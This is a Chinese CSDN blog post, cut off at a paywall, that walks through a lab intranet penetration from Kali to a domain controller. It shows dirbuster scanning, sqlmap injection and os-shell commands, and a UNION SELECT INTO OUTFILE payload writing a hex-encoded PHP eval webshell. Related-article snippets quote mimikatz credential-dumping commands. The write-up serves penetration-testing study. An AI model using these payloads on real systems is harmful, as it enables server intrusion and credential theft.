内网渗透横向攻击流程

最新推荐文章于 2024-08-04 21:24:10 发布
最新推荐文章于 2024-08-04 21:24:10 发布
阅读量233 收藏 1
点赞数
文章标签: web安全 spring boot github 测试工具 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candour_0/article/details/128893988
版权

拓扑环境

1.Kali Linux(攻击机)
2.Centos6.4(web服务器)
3.win7(域成员主机无法上网)
4.win2008R2(域控无法上网)

目的

通过Kali Linux拿到域控权限

2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一

Web渗透

目录扫描

使用dirbuster工具扫描网站根目录 设置kali默认字典文件 /usr/share/wordlists/dirbuster/directory­list­lowercase­2.3­small.txt

扫描获得phpinfo.php

得到网站绝对路径信息

SQL查询报错

通过测试发现存在sql整型注入报错情况,进一步获取webshell

SQL注入

通过sqlmap测试发现存在sql注入

sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3

获取webshell

这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap os­shell的功能

sqlmap(os­shell)

#通过sqlmap获取命令执行会话 sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`

直接写webshell(pass)

http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'

反弹shell

为了更好做后续操作,进行反弹shell

获取目标系统信息

os‐shell> uname ‐a os‐shell> whereis python`

获取meterpreter会话

由于网站上为linux默认安装python,可直接生成python反弹脚本

#生成python反弹脚本 msfv

最低0.47元/天 解锁文章
网络安全大菠萝
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网安全学习(二)---横向渗透
qi_SJQ_的博客
02-09 4103
横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。 1.横向渗透—明文传递at&schtasks: 在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 [at] & [sc
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4933
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
红蓝对抗下的内网横向移动渗透技术详解
lurenjia404的博客
07-02 1858
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内网之中所有的安全防护设备将会形同虚设,红队人员在内网之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
内网渗透linuxlinux横向移动-ssh
m0_62207170的博客
05-09 1715
内网渗透linuxlinux横向移动-ssh
网络战争升级:横向渗透vs纵向渗透,谁才是真正的黑客大师
vivlol918的博客
09-27 1101
通过组织安全意识教育、网络分段、权限管理、安全审计、数据加密和监视等措施,可以有效防护纵向渗透攻击。然而,安全是一个持续的过程,需要不断更新和改进防护措施以应对不断变化的威胁。
内网安全横向传递攻击( RDP || Cobalt Strike )
网络安全领域___专研者.
06-11 2371
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
内网横向渗透
weixin_68652890的博客
04-26 1726
前期:信息搜集 mimikatz获取明文密码 mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords 在windows 2012以上系统 需要修改注册表搭配procdump+mimikatz 获取明文密码密码 哈希传递(pass the hash pth) 1.利用ntlm hash 进行哈希传递 连接工作组账户: mimikatz # privilege::debug //提升权限 mimikatz #sekurlsa::
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
内网渗透测试是一种模拟黑客攻击行为,对内部网络系统进行安全评估的方法。它旨在发现并修复组织内部网络中的安全漏洞,防止真实攻击者利用这些漏洞进行非法活动。红蓝对抗则是内网渗透测试的一种实战演练形式,其中...
内网渗透经典文集
03-03
"杀入内部网络(win内网渗透比较经典的文章).pdf"可能会详细讲解Windows内网环境的渗透技术,包括利用系统漏洞、社会工程学、恶意软件等手段进行攻击。 "域内网渗透中的思路之一.pdf"可能探讨了在域环境中进行渗透...
内网渗透测试-提权工具
05-25
内网渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部网络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
本实践课程旨在教授学员如何进行内网横向渗透测试,模拟真实环境下的攻击与防御,提升安全防护水平。课程覆盖了从环境搭建到实战演练的全过程,主要知识点包括: 1. **虚拟化环境搭建**:使用VMware建立虚拟机,...
CobaltStrike4.0用户手册中文翻译.pdf
01-18
这份手册详细介绍了如何利用Cobalt Strike进行内网渗透横向渗透以及相关的网络安全操作。Cobalt Strike是一款广泛应用于红队操作和安全评估的软件,它为安全专业人员提供了高级的网络攻击模拟和防御测试功能。 ...
横向移动攻击+模型逆推+对抗样本
weixin_46461634的博客
06-30 534
横向移动攻击(Lateral Movement Attack)是指攻击者在已经侵入目标网络或系统的情况下,试图在网络中移动或传播,以获取更高的权限或访问敏感信息。横向移动攻击是网络攻击中的一种常见技术,通常是在网络渗透测试、黑客攻击或恶意软件传播中使用的策略之一。攻击者通过横向移动攻击利用已经被入侵的计算机系统或网络上的漏洞、弱密码、恶意软件或其他安全漏洞,进一步扩大其控制范围,从一个受感染的系统跳转到另一个系统。
真的敢耗时1个月10万字解决Linux内网渗透
aa119101的博客
05-25 3243
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的。本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸、Linux提权、Linux信息收集、Linux隧道技术、Linux横向移动、Linux权限维持、Linux痕迹清理几个部分。 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机。 容器逃逸方法见: https://www.cn
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5671
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
Windows 内网渗透横向渗透
qq_53742230的博客
07-31 3115
内网渗透横向渗透
攻防演练中红队常用的攻击方法之横向移动(中)
ZAWX_NETSTARSEC的博客
07-05 369
尤其是主机RDP相关的弱口令,这类系统远控桌面服务的弱口令一旦被黑客利用,就能通过“撞库”等方式暴力破解,进而实现内网计算机的远程控制。例如,在前不久的美国燃油管道勒索攻击事件中,darkside攻击团伙从文件、内存和域控制器中收集凭据,并利用这些凭据来登录其它主机,再对重要数据和控制端口进行加密,进而实施勒索。黑客为了造成更大影响,通常选择重要的信息系统,如金融、电信、交通、能源等计算机系统,利用横向移动进行大面积网络攻击,导致系统瘫痪,严重影响基本的社会生活。黑客横向移动的手段已经非常成熟。
内网渗透-横向渗透2
huangyongkang666的博客
04-04 2895
内网渗透-横向渗透2 1.域横向 PTH&PTK&PTT 哈希票据传递 1.域横向移动 PTH 传递 PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 1.PTH攻击介绍 ​ PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Ha
微软蓝屏事件揭示的网络安全深层问题与未来应对策略
最新发布
RenGJ010617的博客
08-04 852
最近,由微软视窗系统软件更新引发的全球性“微软蓝屏”事件成为了科技界的头条新闻。此次事件的根源是美国电脑安全技术公司“众击”提供的一个带有严重缺陷的软件更新,该更新在全球范围内导致约850万台设备崩溃,跨越航空、医疗、传媒等多个关键行业,严重影响了全球运输、服务和安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值